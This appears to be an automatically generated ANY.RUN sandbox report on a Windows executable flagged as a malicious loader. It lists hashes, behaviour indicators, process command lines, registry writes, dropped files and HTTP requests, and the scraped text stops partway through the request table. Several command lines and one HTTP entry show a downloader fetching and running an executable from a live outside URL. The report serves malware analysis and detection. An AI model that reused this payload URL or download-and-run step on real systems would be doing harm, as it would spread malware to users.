File name:

1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe

Full analysis: https://app.any.run/tasks/8f2c90ca-56a3-429d-b4ea-0f12ab88748c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 25, 2025, 01:13:17
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
auto
generic
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

0A93CE89508F3B14786AE1F45759742B

SHA1:

CAA7F7E1FAF7FE9F8918B4C7B26311543C48D9E3

SHA256:

1F92CFDC2FA76A66702EA6A843C2EA0DC75C7F074F58AAE0B77CA55933BEFADC

SSDEEP:

12288:MDwEjW3ZtHf1FgR9M29ik1EwBZVHhzVVVVVVVVVVV9VFlmlO0tl:MDwyWX//gw+jmOfHhvl7s

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GENERIC has been found (auto)

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • WEBDOWN.EXE (PID: 6096)
      • WEBDOWN.EXE (PID: 3364)
      • WEBDOWN.EXE (PID: 2828)

  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)

    • Process requests binary or script from the Internet

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • WEBDOWN.EXE (PID: 6096)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • WEBDOWN.EXE (PID: 3364)
      • WEBDOWN.EXE (PID: 2828)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 2088)

    • Executable content was dropped or overwritten

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • WEBDOWN.EXE (PID: 6096)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • WEBDOWN.EXE (PID: 3364)
      • WEBDOWN.EXE (PID: 2828)

    • Potential Corporate Privacy Violation

      • WEBDOWN.EXE (PID: 6096)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • WEBDOWN.EXE (PID: 3364)
      • WEBDOWN.EXE (PID: 2828)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 2088)

    • There is functionality for taking screenshot (YARA)

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 2088)

    • Application launched itself

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)

  • INFO

    • Checks supported languages

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • WEBDOWN.EXE (PID: 6096)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • WEBDOWN.EXE (PID: 3364)
      • WEBDOWN.EXE (PID: 2216)
      • WEBDOWN.EXE (PID: 1224)
      • WEBDOWN.EXE (PID: 2828)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 2088)

    • Process checks computer location settings

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)

    • Reads the computer name

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5740)
      • WEBDOWN.EXE (PID: 6096)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • WEBDOWN.EXE (PID: 3364)
      • WEBDOWN.EXE (PID: 2216)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)
      • WEBDOWN.EXE (PID: 2828)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)
      • WEBDOWN.EXE (PID: 1224)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 2088)

    • Manual execution by a user

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 5268)
      • WEBDOWN.EXE (PID: 4908)
      • notepad.exe (PID: 5464)
      • WEBDOWN.EXE (PID: 5308)
      • WEBDOWN.EXE (PID: 2216)
      • WEBDOWN.EXE (PID: 1224)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 1468)
      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 5464)

    • Create files in a temporary directory

      • 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe (PID: 4548)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:01:18 00:59:12+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.36
CodeSize: 161280
InitializedDataSize: 86016
UninitializedDataSize: -
EntryPoint: 0x857d
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
149
Monitored processes
15
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe webdown.exe no specs #GENERIC webdown.exe 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe webdown.exe no specs #GENERIC webdown.exe webdown.exe no specs webdown.exe notepad.exe no specs webdown.exe no specs webdown.exe 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe #GENERIC webdown.exe 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe

Process information

PID
CMD
Path
Indicators
Parent process
1224"C:\Users\admin\Desktop\WEBDOWN.EXE" C:\Users\admin\Desktop\WEBDOWN.EXE
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\webdown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
1468"C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe" C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
2088"C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe"C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
2216"C:\Users\admin\Desktop\WEBDOWN.EXE" C:\Users\admin\Desktop\WEBDOWN.EXE
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\webdown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
2828"C:\Users\admin\Desktop\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/admin/Desktop/1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe" RUNC:\Users\admin\Desktop\WEBDOWN.EXE
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\webdown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
3364"C:\Users\admin\Desktop\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/admin/Desktop/1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe" RUNC:\Users\admin\Desktop\WEBDOWN.EXE
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\webdown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
4548"C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe" C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
4640"C:\Users\admin\Desktop\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/admin/Desktop/1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe" RUNC:\Users\admin\Desktop\WEBDOWN.EXE1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\webdown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
4908"C:\Users\admin\Desktop\WEBDOWN.EXE" C:\Users\admin\Desktop\WEBDOWN.EXEexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\desktop\webdown.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
5268"C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe" C:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events
9 954
Read events
9 782
Write events
164
Delete events
8

Modification events

(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:NodeSlots
Value:
02020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Operation:writeName:MRUListEx
Value:
040000000E0000000300000000000000100000000F0000000C0000000D0000000B000000050000000A000000090000000800000001000000070000000600000002000000FFFFFFFF
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4
Operation:writeName:MRUListEx
Value:
010000000000000004000000050000000200000003000000FFFFFFFF
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\Shell
Operation:writeName:SniffedFolderType
Value:
Generic
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:GlobalAssocChangedCounter
Value:
105
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\NavPane
Operation:writeName:ExpandedState
Value:
12000000160014001F80CB859F6720028040B29B5540CC05AAB60000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000FFFF00000000000000000000160014001F60983FFBB4EAC18D42A78AD1F5659CBA930000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000FFFF00000000000000000000160014001F7840F05F6481501B109F0800AA002F954E0000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000000000000000000000000000160014001F706806EE260AA0D7449371BEB064C986830000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000FFFF00000000000000000000160014001F580D1A2CF021BE504388B07367FC96EF3C0000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000000000000000000000000000160014001F5425481E03947BC34DB131E946B44C8DD50000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000000000000000000000000000160014001F50E04FD020EA3A6910A2D808002B30309D0000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000FFFF000000000000000000003C003A001F44471A0359723FA74489C55595FE6B30EE260001002600EFBE1000000034E9025AA9B7D80155EC262BAAB7D8018F3827B5B0B7D80114000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000FFFF000000000000000000003C003A001F42665C8D01334507439B53224DE2ED1FE6260001002600EFBE11000000A1C1E0E0AF27D301F77F6305B0B7D8019F22F307B0B7D80114000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000000000000000000000000000940092003200000080004658D1892000474F4F474C457E312E5A49500000760009000400EFBE4658D1894658D1892E000000F55D05000000090000000000000000000000000000001F47700047006F006F0067006C0065004300680072006F006D00650045006E0074006500720070007200690073006500420075006E0064006C006500360034002E007A006900700000001C000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B0000000000000000000000000000005C005A00320099030000F2588C582000657874312E7A69700000420009000400EFBEF2588C58F2588C582E000000A70D00000000160000000000000000000000000000003A91F90065007800740031002E007A0069007000000018000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B00000000000000000000000000000050004E00310000000000F258CE5810006578743100003A0009000400EFBEF258CE58F258CE582E000000DE0200000000170000000000000000000000000000001CB7E9006500780074003100000014000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000FFFF000000000000000000006E006C0032001EEC0500F258826620005052454645527E312E5A49500000500009000400EFBEF2588266F25882662E00000028D4000000001900000000000000000000000000000005A1250050007200650066006500720065006E006300650073002E007A006900700000001C000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B0000000000000000000000000000005800560032007E0D0000F258866620006578742E7A697000400009000400EFBEF2588666F25886662E0000002AD4000000001E0000000000000000000000000000005498DF006500780074002E007A0069007000000016000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B00000000000000000000000000000062006000310000000000F2588D6610005052454645527E310000480009000400EFBEF2588D66F2588F662E0000002E2F0100000017000000000000000000000000000000CF57130150007200650066006500720065006E00630065007300000018000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B0000000000000000000000000000004C004A00310000000000F2589066100065787400380009000400EFBEF2589066F25890662E000000E88D0100000007000000000000000000000000000000DE8B4100650078007400000012000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000000000000000000000000000780076003200C1862C03F258957920004F4D4E495F327E312E5A495000005A0009000400EFBEF258E578F25895792E0000007C600500000039000000000000000000000000000000DE6FED006F006D006E0069005F00320033005F00310030005F0032003000320034005F002E007A006900700000001C000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B00000000000000000000000000000070006E0032007E0D0000F2587B7920004348524F4D497E312E5A49500000520009000400EFBEF2587B79F2587B792E000000C260050000001800000000000000000000000000000028F586006300680072006F006D00690075006D005F006500780074002E007A006900700000001C000000010000004D0000001C00000031535053A66A63283D95D211B5D600C04FD918D0000000002D00000031535053357EC777E31B5043A48C7563D727776D1100000002000000000B000000000000000000000000000000
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
Operation:writeName:Mode
Value:
4
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
Operation:writeName:LogicalViewMode
Value:
1
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
Operation:writeName:FFlags
Value:
(PID) Process:(4548) 1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\Bags\34\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}
Operation:writeName:IconSize
Value:
16
Executable files
7
Suspicious files
0
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
45481f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeC:\Users\admin\AppData\Local\Temp\JEDITOR\Logo.pngimage
MD5:5F111D2535BC550F49876A81D785202D
SHA256:4C75B62AA41E683FD8BCDA17529D387CF2B8C5564945BE051997E564170CE198
6096WEBDOWN.EXEC:\Users\admin\Downloads\WEBDOWN.INItext
MD5:35C36302504045D31E14BA7E202CC477
SHA256:D097EF882429203C67A22218AA212983E244F0FAC6638A31653B12DCB090F954
57401f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeC:\Users\admin\Downloads\WEBDOWN.EXEexecutable
MD5:35EC5F7D35646A1E5BCA50612A9C71DA
SHA256:BE57F5AA448CE0C6834A7476B32C4279D7BE20C16D1BDFA92EF755542C334DCE
57401f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeC:\Users\admin\Downloads\WEBDOWN.EXE.miniexecutable
MD5:35EC5F7D35646A1E5BCA50612A9C71DA
SHA256:BE57F5AA448CE0C6834A7476B32C4279D7BE20C16D1BDFA92EF755542C334DCE
3364WEBDOWN.EXEC:\Users\admin\Desktop\WEBDOWN.INItext
MD5:35C36302504045D31E14BA7E202CC477
SHA256:D097EF882429203C67A22218AA212983E244F0FAC6638A31653B12DCB090F954
3364WEBDOWN.EXEC:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe.miniexecutable
MD5:0A93CE89508F3B14786AE1F45759742B
SHA256:1F92CFDC2FA76A66702EA6A843C2EA0DC75C7F074F58AAE0B77CA55933BEFADC
6096WEBDOWN.EXEC:\Users\admin\Downloads\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe.miniexecutable
MD5:0A93CE89508F3B14786AE1F45759742B
SHA256:1F92CFDC2FA76A66702EA6A843C2EA0DC75C7F074F58AAE0B77CA55933BEFADC
2828WEBDOWN.EXEC:\Users\admin\Desktop\1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe.miniexecutable
MD5:0A93CE89508F3B14786AE1F45759742B
SHA256:1F92CFDC2FA76A66702EA6A843C2EA0DC75C7F074F58AAE0B77CA55933BEFADC
45481f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeC:\Users\admin\Desktop\NoName01.cpptext
MD5:81EBD0AFF9D080115A3B7E27F134F3CE
SHA256:0281D2A2335247D5E48E49BCB8E180EDA0EC10364B2BBE87244444BE0065FDAA
52681f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exeC:\Users\admin\Desktop\WEBDOWN.EXE.miniexecutable
MD5:35EC5F7D35646A1E5BCA50612A9C71DA
SHA256:BE57F5AA448CE0C6834A7476B32C4279D7BE20C16D1BDFA92EF755542C334DCE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
27
TCP/UDP connections
52
DNS requests
19
Threats
11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5880
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5880
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5740
1f92cfdc2fa76a66702ea6a843c2ea0dc75c7f074f58aae0b77ca55933befadc.exe
GET
119.194.226.67:80
http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE
unknown
unknown
5064
SearchApp.exe
GET
200
2.17.190.73:80
